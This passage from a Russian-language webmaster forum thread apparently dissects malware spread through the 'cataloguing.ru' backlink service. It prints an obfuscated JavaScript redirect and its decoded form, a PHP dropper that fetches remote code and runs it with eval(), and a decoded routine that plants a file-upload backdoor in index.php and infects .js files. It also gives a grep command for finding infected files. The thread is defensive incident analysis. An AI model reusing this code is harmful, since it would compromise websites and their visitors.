SEa7I1gdoH9HePfMLdPCssR+Ge5YW4rxVaracfIzMAnheUIhqb7mLAwNzthEfZg32kHjcfL+/P2CEhsCoHQorPCInKOCcvaYTabt03rJ4TC2ghoXZCwcIf+pLAol/XHrvWwCcvEvsei3UEkrI0gty2FCctsXbYTFsEZT0J0v6KCQWJ6WH1VeIWRQF9hbQFYg0F1D/ROtEPfRMemQBUNEwtZW1vxXDBqgRawiOcIehH0pTUJa21t1UqL5a/kRn+Dh7klYG77FpcN0PMXYlFuWMWZsDA3zcjsgDA34q23iTA6N0i5FSN20GT8lX7SMykGxvoCc+sfnx/+S/GGZphIOxDb6J8W9U12CnmOgHKjUwjG2o65ldLrez63jeVJR14slmqMtxV3fPZZxHMElNvc4gzl5oK5RdAf0PZMfHz9fnxubX0g/9raKvwPwx0hY/+iD44AAAAASUVORK5CYII="></a></div>
        <div id="menu">
            <button onclick="get_data('catalog')">ПРОГОН ПО КАТАЛОГАМ</button>
            <button onclick="get_data('spr')">РЕГИСТРАЦИЯ В СПРАВОЧНИКАХ</button>
            <div id="res">Файл установлен корректно</div>
        </div>
        <div id="links"><a href="#">ТУТ БУДУТ ГЕНЕРИРОВАТЬСЯ ОБРАТНЫЕ ССЫЛКИ, ЕСЛИ БУДЕТ НУЖНО</a></div>
    </div>
    <script src="http://cataloguing.ru/js/panel.min.js"></script>
</body>
</html>'); И что мы видим ? header("Content-type: text/html; charset=UTF-8"); // --> Устанавливаем кодировку выводимого текста echo .. // --> Выводит текст В результате получаем вот эту страницу: <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ</title> <link href="http://cataloguing.ru/css/panel.css'>http://cataloguing.ru/css/panel.css" rel="stylesheet" type="text/css" media="screen" /> <link href="http://cataloguing.ru/img/favicon.ico'>http://cataloguing.ru/img/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <script type="text/javascript">createPopup().show( 0, 0, 0, 0, 0 );</script> </head> <body oncontextmenu="return false;"> <div id="main"> <div id="new"><h1>ПАНЕЛЬ УПРАВЛЕНИЯ</h1><a href="http://cataloguing.ru"><img src="data:image/png;base64,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"></a></div> <div id="menu"> <button onclick="get_data('catalog')">ПРОГОН ПО КАТАЛОГАМ</button> <button onclick="get_data('spr')">РЕГИСТРАЦИЯ В СПРАВОЧНИКАХ</button> <div id="res">Файл установлен корректно</div> </div> <div id="links"><a href="#">ТУТ БУДУТ ГЕНЕРИРОВАТЬСЯ ОБРАТНЫЕ ССЫЛКИ, ЕСЛИ БУДЕТ НУЖНО</a></div> </div> <script src="http://cataloguing.ru/js/panel.min.js"></script> </body> </html> Простая HTML страница. Анализ JS кода не выдал ничего подозрительного. Если же например загрузить страницу по ссылке http://cataloguing.ru/work.txt?q=test, то мы увидим следующее: header("Content-type: text/xml; charset=UTF-8");echo base64_decode('PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVzdWx0PnRlc3Q8L3Jlc3VsdD4='); Если расшифровать результат выполнения скрипта выше, то мы получим следующее: <?xml version="1.0" encoding="UTF-8"?> <result>test</result> Как видим то что мы указали в q то и получилось <result> выполнения скрипта. Считаю свой моральный долг по анализу кода выполненным. Если что, можете меня дополнить Riminy 1 Link to post Share on other sites
cyber 5 Posted April 11, 2016 Report Share Posted April 11, 2016 Пожалуй, дополню =) Недавно обнаружил странные редиректы на некоторых сайтах на хостинге. Удалось обнаружить вредоносный код в некоторых js-файлах. Код следующий: (function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}()); После деобфускации этот код принимает следующий вид: (function() { function c(x) { //Возвращает текущий домен из URL вида (zzz.)xxx.yy if (x.substr(0, 8) == 'https://') x = x.substr(8); if (x.substr(0, 7) == 'http://') x = x.substr(7); if (x.substr(0, 4) == 'www.') x = x.substr(4); if (x.indexOf('/') != -1) x = x.split('/')[0]; if (x.indexOf('?') != -1) x = x.split('?')[0]; return x } var host = c(window.location.hostname), // Получаем хостнейм из URL (вида xxx.yy) ref = c(document.referrer), // То же самое с рефферером co = document.cookie, // Получаем куки ident = '_y_m_=off', // Уникальная лабуда для куки D = new Date(); // Текущая дата D.setDate(D.getDate() + 20); // Срок жизни куки - 20 дней document.cookie = ident + ';path=/;expires=' + D; // Записываем куки с именем "_y_m_" и содержимым "off", путь - корень, живет 20 дней if (ref != '' && ref != host && co.indexOf(ident) == -1) { // Тут интересное. Если рефферер не пустой (!) setInterval(function() { // Если рефферер не совпадает с хостом (!!!) и если нету куки, то... window.location.href = 'http://02o.org/1a' // Редирект с задержкой 2 секунды }, 2000) // Ссылки разные, это сокращалки URL, ведут на http://y-map.ru/ } }()); Соответсвенно, далее просмотр логов выявил, что на одном из сайтов был залит в корень подозрительный файл (залил человек, который имел доступ по фтп) - "1.php". Содержимое файла следущее: <?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?> Функция eval() сразу вызывает нехорошее предчувствие После деобфускации: <?php ini_set('display_errors', 'Off'); // Отключается вывод ошибок error_reporting('E_ALL'); $b = 'http://cataloguing.ru/work.txt'; // Ссылка на "боевую нагрузку" $q = $_GET['q']; // Тут получаем параметр "q" if ($q) $b.= '?q=' . $q; // Если параметр задан, добавляем его к ссылке из переменной $b $d = file_get_contents($; // Считываем содержимое по ссылке eval($d); ?> // И передаем полученный код на исполнение Если переходить по ссылке ""http://cataloguing.ru/work.txt?q=active". Тут самая мякоть. Вместо "панели управления" получем уже конкретную боевую нагрузку: eval(gzuncompress(base64_decode('eNqVVFFrgzAQ/it7GNjCGFbnhgwf3EMt0nbUDU0zRlFj11HritI5/fXLXcQHlwh7MInc5e6777vLtbd8fnKXL2/aztAfZvzTZzvt3XHLMm4mSVxl93c7lqVfLJto2tWtlpBgn57mcLxQFzbH0aY3A88UDGYAa8Ng9WxYy7+e9ASGvKKhnWfombdsAYeVJO7WsOts42BaWSyMU1ACDph9z29cmBde2EIaD3xO8xY2+op/OjHwZs5vwn6kG2mFZp+jSUWFrRwRxg5hxXg18iEQdujgDAhVVeONyKriyJIxaPyA/Xv7IcMJppiskQsq+EXMsorCTzClZtAoMCz8cyJlo2MeQ2ciA1dxpdCJjcYRfNkF7siV4AmOA67G4oNNoVynmlQxqD7pskjwYb9grTUjA/2QoZVCA3XNXFVwOBNzjcQxV8oM8RF1Yvp77LdTWCfYg74eR7BbhXIOG+bZ5X90QPYMnskMDtgTxUY2PXxy+NT0EwMLZwQmRqFMNzUjE4PdByyIyawk2DguGllHYqwrGs0lKsVCEVgO1AsbdZYUPRWTC6aqm9ycd3Xb4xrtvi2+aMAM8tG9Kf1rMXhXpo+/3ouKkA==')));eval(gzuncompress(base64_decode('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')));eval(gzuncompress(base64_decode('eNqNVE2L2zAQ/SsuhF0PTY1mZEs2rgvtpZeFHnpcUmHSmF1YEsh2DyXkv1cjx6lEGaUGGWTPx5t5b2Z6229/PR/2xYtzqoTTyqnBIbWdNqTqUkH/PJXHw9v+Z6nem6ZV8HH19eHbl88P3x/vHSmL/ih095tHtbkaklEE6+WmO6sBQPLDTblyuF458keHhJIpsakChokxTIRectHBxUdmG1cPkl0dULBNE0cm/qJFr2ZTRsa+yhx6wynqUOQwDNP48roTm2IX2LqovJNcX3vBfT5PEZXoPxrvbf1p4TQdjrtx+yQi6ziILaqolhpgfC049SlTEqpQk2ckSlqHpP155wvMOjPz0j+aA68/LCrCquEDvncRTH/PptCZFPUFO8uJ4qCGSSeRdGwyQc0laE4IGNil0KZFCcXdXSHaB5IJPl17odT8ykxVJ4OkC2s8cywvJosf0R4TmVtYR7cWZHESJY7d3JbrmtCq0tFz6w4/rvuFKtv8+wbINJHCJmB9ktw1qpcZzYwcef6hnxemF0orCoVMUj56uvowJ+PxOP4ukzYiwjw2ufVn03iURvDr592tvULt0oX278YVjTsuVNysKkVzQ/Q6FRE2KXjzH+A1LVvRzMB326eDSLjWaULr8f0BQqa0yg=='))); Деобфусцируем: <?php function l__0() { // Функция дописывает в начало файла index.php (который находится рядом с 1.php) вредоносный код для заливки файлов $_0 = "index.php"; if (file_exists($_0)) { $_1 = "b3455686wnFsadn54N9FDa.txt"; copy($_0, $_1); $_4 = file_get_contents($_1); $_5 = mop; $_3 = "<?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>"; if strpos($_4, $_3) === false) file_put_contents($_0, $_3 . $_4); unlink($_1); } } function l__1($_6, $_7, $_8) { // Рекурсивно перебирает файлы по маске *.js и добавляет в конец тот самый вредоносный код из переменной "$_8" foreach (glob($_7 . "/*") as $_4) { if (is_dir($_4)) { l__1($_6, $_4, $_8); } else { if (substr(trim($_4), -3) == ".js") { if (file_exists(trim($_4))) { $_2 = ""; $_2 = file_get_contents(trim($_4)); if (strpos($_2, $_8) === false && strlen($_2) > 2000) file_put_contents(trim($_4), $_2 . $_8); } } } } } ini_set(display_errors, Off); error_reporting(E_ALL); ob_start(); l__0(); // Раз $_8 = "(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());"; l__1(array(), "..", $_8); // Два ob_end_clean(); header("Content-type: text/xml; charset=UTF-8"); echo '<?xml version="1.0" encoding="UTF-8"?><result>active</result>'; В переменной "$_8" может быть несколько иной код от случая к случаю, там бывают различные "сокращалки URL". Чтобы выявить зараженные сайты, использовал следующую конструкцию: find ./ -name '*.js' | xargs grep "xut7ixut" | cut -d: -f1 >> /root/infected.log Посмотрел по логам - залить через инфицированный index.php ничего не успели. Восстановился из бэкапов. Теоретически, можно всё вычистить скриптом. PS: я не кодер, я админ, мог ошибиться в разборе кода, буду признателен за замечания. Надеюсь, это поможет кому-нибудь... shopeq, campusboy, Riminy and 1 other 4 Link to post Share on other sites
Модератор files 2844 Posted April 12, 2016 Модератор Report Share Posted April 12, 2016 cyber, все верно. Спалили их окончательно. Могу подтвердить, что заражают они как раз js-файлы сайта, внедряя туда редиректы. Чистил за ними часто за свою практику. campusboy 1 Link to post Share on other sites
Recommended Posts
Please sign in to comment
You will be able to leave a comment after signing in
Sign In Now